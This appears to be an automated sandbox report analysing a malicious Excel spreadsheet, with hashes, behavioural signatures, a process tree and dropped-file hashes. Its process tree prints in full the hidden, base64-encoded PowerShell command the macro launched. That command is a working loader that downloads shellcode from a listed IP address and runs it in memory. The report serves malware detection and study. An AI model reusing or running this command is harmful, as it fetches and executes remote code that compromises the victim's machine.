Analysis
-
max time kernel
14s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13-11-2024 22:05
Behavioral task
behavioral1
Sample
e0ea4752bd671d195f53c4699aa6a2e169c2026a73f153f9bcad66cb59355160.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e0ea4752bd671d195f53c4699aa6a2e169c2026a73f153f9bcad66cb59355160.xls
Resource
win10v2004-20241007-en
General
-
Target
e0ea4752bd671d195f53c4699aa6a2e169c2026a73f153f9bcad66cb59355160.xls
-
Size
46KB
-
MD5
4cb9e433653daf1ac21b6852e6fa6fd6
-
SHA1
0a98f758d62251129c9ac997fe3d7c43cdccd3d6
-
SHA256
e0ea4752bd671d195f53c4699aa6a2e169c2026a73f153f9bcad66cb59355160
-
SHA512
1bb0ffb07d750ce1f6720b05e67b9a06d8dd7fa7274afee511cc7983778a11493a39621585bf9c174e89e6e45eaf34961ce5aa129da82fc082d3dcbb744acb6c
-
SSDEEP
768:I4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:DSFsv66g3KnF439NKC54kkGfn+cL2Xd+
Malware Config
Extracted
https://194.182.164.149:8080/fontawesome.woff
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2852 2532 powershell.exe 29 -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 4 2852 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
EXCEL.EXEpowershell.execsc.execvtres.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 2532 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2852 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid Process 2532 EXCEL.EXE 2532 EXCEL.EXE 2532 EXCEL.EXE 2532 EXCEL.EXE 2532 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
EXCEL.EXEpowershell.execsc.exedescription pid Process procid_target PID 2532 wrote to memory of 2852 2532 EXCEL.EXE 30 PID 2532 wrote to memory of 2852 2532 EXCEL.EXE 30 PID 2532 wrote to memory of 2852 2532 EXCEL.EXE 30 PID 2532 wrote to memory of 2852 2532 EXCEL.EXE 30 PID 2852 wrote to memory of 3020 2852 powershell.exe 32 PID 2852 wrote to memory of 3020 2852 powershell.exe 32 PID 2852 wrote to memory of 3020 2852 powershell.exe 32 PID 2852 wrote to memory of 3020 2852 powershell.exe 32 PID 3020 wrote to memory of 2640 3020 csc.exe 33 PID 3020 wrote to memory of 2640 3020 csc.exe 33 PID 3020 wrote to memory of 2640 3020 csc.exe 33 PID 3020 wrote to memory of 2640 3020 csc.exe 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\e0ea4752bd671d195f53c4699aa6a2e169c2026a73f153f9bcad66cb59355160.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xyawoivo.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAFD0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAFCF.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2640
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5456649f813fa1800187f64b2d872c9bf
SHA169e880e8f43c7f99cc4c7b7fefb8c9a3db0f3c4b
SHA2563bf1be1015cf850b32d5fd192173debbce11a87f117fcb59a156a65112bf90a4
SHA512ffbb197a07e0ac99f1c9dc54c27c76754d9bf4e6278a9ad69264431926fd6f293978fdc21b31d9151017fa181571110a0a073625172472573d56243682e6d8da
-
Filesize
3KB
MD55aef608fb38eebee73ea908d92e3127d
SHA1af84d9d5584da33cf202891dfcb5a84642c462d1
SHA256e3b31ac8289342314f47aff9ef3743006a00b3f60138efd8cbc68e28c9605904
SHA5122bde2427935c7a5060062f815b4f35e489860369d66715cee3a43c9db6b4141b528c41ce54f4fd2e8a6404708f185bda87f2427f059a8bb2843bdf49ee112624
-
Filesize
7KB
MD5cefbf050b7c6f4ce343a19a096ffb612
SHA13202fce107169ce5707ae0703f9353de9fbc510b
SHA25674d2b3f75275df243b74cfca952f0d5459b37fe6fd84629312512501e4069d58
SHA512a4d4be199c406f39c7cc8bf570b93ff76b7f69fa550bc6045bd7c5c0d853597c5d695f8b719994e8b5b020d4b2e47845e58e808194aac4f7c044ced5a64a0c3a
-
Filesize
652B
MD54088f6c77815a627cf584875da2260ff
SHA1d1001f9ca5d66677a04398f225db119971b64839
SHA256349f37cd58f3ee07ebb545fa0886cdef25257383bd1328190a4048c8c1980339
SHA51259d92a8a4536598a967d7d1655a99793e74f1cd19a7e88a0e5a8887ff15730ce8cd89c0a52313e2000fa96615998b852daa9621b27d4c6f1669bf9834f2e9fc9
-
Filesize
631B
MD5f4dd5c682eb7b3b679f084261bfc7c4c
SHA170f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA2562908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA5128f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d
-
Filesize
309B
MD5c45391e3d9c4f0415fb1be614be64bab
SHA1f3be2d74d415860de19b035114d4d2046fa097a0
SHA2560eeb61757cc0180ae7ea4b83e38df5752444830e50a80c822e1c55a96ede2752
SHA5124fc8feedeb42dc60ae9b86d13fb31fbc2425d8d2376afdd464aa0167ad4efee70e7b1d316423fceb13408e0b8cbc5534ea94698b865a57bdf4cad5b7728a2594